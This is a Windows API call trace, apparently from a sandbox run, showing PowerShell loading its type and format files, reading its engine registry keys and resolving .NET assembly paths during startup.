	[0800.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0800.851] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d528 | out: phkResult=0x24d528*=0x31c) returned 0x0
	[0800.851] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d4ac, lpData=0x0, lpcbData=0x24d4a8*=0x0 | out: lpType=0x24d4ac*=0x1, lpData=0x0, lpcbData=0x24d4a8*=0x56) returned 0x0
	[0800.851] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0800.851] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d47c, lpData=0x1b7f8c30, lpcbData=0x24d478*=0x56 | out: lpType=0x24d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d478*=0x56) returned 0x0
	[0800.851] CoTaskMemFree (pv=0x1b7f8c30) 
	[0800.851] RegCloseKey (hKey=0x31c) returned 0x0
	[0800.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0800.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0806.559] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0806.561] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0806.562] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0806.563] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0806.565] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0806.566] VirtualQuery (in: lpAddress=0x24c210, lpBuffer=0x24d0d0, dwLength=0x30 | out: lpBuffer=0x24d0d0*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0808.098] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0808.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.098] CoTaskMemFree (pv=0x1817b0) 
	[0808.127] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6c8 | out: phkResult=0x24d6c8*=0x304) returned 0x0
	[0808.127] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x24d6dc, lpData=0x0, lpcbData=0x24d6d8*=0x0 | out: lpType=0x24d6dc*=0x1, lpData=0x0, lpcbData=0x24d6d8*=0x74) returned 0x0
	[0808.127] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x24d64c, lpData=0x0, lpcbData=0x24d648*=0x0 | out: lpType=0x24d64c*=0x1, lpData=0x0, lpcbData=0x24d648*=0x74) returned 0x0
	[0808.127] CoTaskMemAlloc (cb=0x78) returned 0x127cb0
	[0808.127] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x24d61c, lpData=0x127cb0, lpcbData=0x24d618*=0x74 | out: lpType=0x24d61c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d618*=0x74) returned 0x0
	[0808.127] CoTaskMemFree (pv=0x127cb0) 
	[0808.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0808.127] SetErrorMode (uMode=0x1) returned 0x1
	[0808.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d5a0 | out: lpFileInformation=0x24d5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0808.128] SetErrorMode (uMode=0x1) returned 0x1
	[0808.129] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0808.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.129] CoTaskMemFree (pv=0x1817b0) 
	[0809.006] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0809.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.007] CoTaskMemFree (pv=0x1817b0) 
	[0809.007] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0809.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.007] CoTaskMemFree (pv=0x1817b0) 
	[0809.008] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0809.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.008] CoTaskMemFree (pv=0x1817b0) 
	[0809.008] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0809.008] GetFileType (hFile=0x318) returned 0x1
	[0809.008] SetErrorMode (uMode=0x1) returned 0x1
	[0809.008] GetFileType (hFile=0x318) returned 0x1
	[0809.009] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.011] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.011] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.011] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.014] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.014] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.014] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x9e2, lpOverlapped=0x0) returned 1
	[0809.015] ReadFile (in: hFile=0x318, lpBuffer=0x3490eba, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3490eba*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0809.015] ReadFile (in: hFile=0x318, lpBuffer=0x3491970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3491970*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0809.015] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x318) returned 0x0
	[0809.015] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0809.015] CoTaskMemAlloc (cb=0x5a) returned 0x17c780
	[0809.015] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x17c780, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0809.015] CoTaskMemFree (pv=0x17c780) 
	[0809.016] RegCloseKey (hKey=0x318) returned 0x0
	[0809.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.021] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf7e47fff, Data2=0xedd9, Data3=0x406a, Data4=([0]=0x8c, [1]=0xf8, [2]=0x29, [3]=0xbd, [4]=0x79, [5]=0x4f, [6]=0x30, [7]=0x27))) returned 0x0
	[0809.025] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9c5f7f85, Data2=0x50c9, Data3=0x4e34, Data4=([0]=0x89, [1]=0x11, [2]=0xfa, [3]=0xad, [4]=0x48, [5]=0xcb, [6]=0xa7, [7]=0xbc))) returned 0x0
	[0809.026] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0809.026] GetFileType (hFile=0x318) returned 0x1
	[0809.026] SetErrorMode (uMode=0x1) returned 0x1
	[0809.027] GetFileType (hFile=0x318) returned 0x1
	[0809.027] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.028] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.029] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.030] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.030] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.032] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0xfb2, lpOverlapped=0x0) returned 1
	[0809.032] ReadFile (in: hFile=0x318, lpBuffer=0x34bbbf2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bbbf2*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0809.032] ReadFile (in: hFile=0x318, lpBuffer=0x34bc4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34bc4d8*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0809.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x318) returned 0x0
	[0809.033] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0809.033] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0809.033] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0809.033] CoTaskMemFree (pv=0x1b7f8c30) 
	[0809.033] RegCloseKey (hKey=0x318) returned 0x0
	[0809.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0809.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0809.857] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x10095eef, Data2=0xbf80, Data3=0x47b0, Data4=([0]=0x8e, [1]=0xf, [2]=0x7c, [3]=0x9d, [4]=0x30, [5]=0xd9, [6]=0x2c, [7]=0x5e))) returned 0x0
	[0809.858] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x255ce627, Data2=0x3a4c, Data3=0x4d86, Data4=([0]=0xbc, [1]=0x3c, [2]=0x46, [3]=0x1d, [4]=0x66, [5]=0x9e, [6]=0x6b, [7]=0xe))) returned 0x0
	[0809.858] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xedc4c3f9, Data2=0xd85, Data3=0x4501, Data4=([0]=0x89, [1]=0xb0, [2]=0x79, [3]=0xec, [4]=0x25, [5]=0xe0, [6]=0x91, [7]=0x87))) returned 0x0
	[0809.858] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x486814c8, Data2=0x2c3c, Data3=0x4f08, Data4=([0]=0xa4, [1]=0x80, [2]=0xee, [3]=0x81, [4]=0x5c, [5]=0x54, [6]=0xea, [7]=0x6e))) returned 0x0
	[0809.858] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x102218cb, Data2=0x52d8, Data3=0x4c3c, Data4=([0]=0xbf, [1]=0x2d, [2]=0x11, [3]=0xca, [4]=0xb0, [5]=0xe0, [6]=0xfe, [7]=0xef))) returned 0x0
	[0809.859] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x890c3767, Data2=0x5d7a, Data3=0x4959, Data4=([0]=0x8c, [1]=0x85, [2]=0x47, [3]=0x23, [4]=0xc3, [5]=0xcd, [6]=0xe9, [7]=0x4))) returned 0x0
	[0809.859] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0809.859] GetFileType (hFile=0x304) returned 0x1
	[0809.859] SetErrorMode (uMode=0x1) returned 0x1
	[0809.859] GetFileType (hFile=0x304) returned 0x1
	[0809.859] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.860] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.860] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.861] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.861] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.861] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0809.861] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0xaca, lpOverlapped=0x0) returned 1
	[0809.862] ReadFile (in: hFile=0x304, lpBuffer=0x336ceda, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336ceda*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0809.862] ReadFile (in: hFile=0x304, lpBuffer=0x336d8a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x336d8a8*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0809.862] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0809.862] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0809.862] CoTaskMemAlloc (cb=0x5a) returned 0x18f850
	[0809.862] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x18f850, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0809.862] CoTaskMemFree (pv=0x18f850) 
	[0809.862] RegCloseKey (hKey=0x304) returned 0x0
	[0809.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0809.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0809.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0809.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0809.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0809.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0810.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0810.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0810.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0810.833] VirtualQuery (in: lpAddress=0x24bd60, lpBuffer=0x24cc20, dwLength=0x30 | out: lpBuffer=0x24cc20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
